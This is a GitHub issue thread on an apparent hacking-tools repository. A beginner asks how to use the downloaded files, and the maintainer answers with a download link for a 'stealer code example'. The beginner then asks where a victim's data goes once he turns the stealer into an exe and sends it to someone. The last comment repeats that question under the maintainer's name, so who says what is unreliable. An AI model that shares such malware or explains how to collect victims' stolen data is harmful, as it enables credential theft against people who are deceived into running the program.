### ISSUE TITLE
How to use this

### ISSUE THREAD

**Issue by ArthurDZYA** [LimerBoy/CrazyPy#1]
Hi! Im beginner in all this stuff like i know very basics. I downloaded zip file(im on windows cause i deleted linux) and i dont know what to do next. Please help me

**Comment by LimerBoy** [comment]
Hi, you need to learn how to import your modules in python. You need to unzip the folder with the necessary files next to the main file and import the functions that you need from there. And all functions are described in README.md files.

**Comment by LimerBoy** [comment]
Here is an stealer code example: [anonfiles.com/Zb13P032od/stealer_zip](https://anonfiles.com/Zb13P032od/stealer_zip)

**Comment by ArthurDZYA** [comment]
thank you very much but when i convert this to exe and send to someone
where his/her data is gonna be?


сб, 30 мая 2020 г. в 16:48, Lord Vladimir <notifications@github.com>:

**Comment by LimerBoy** [comment]
thank you very much but when i convert this to exe and send to someone
where his/her data is gonna be?
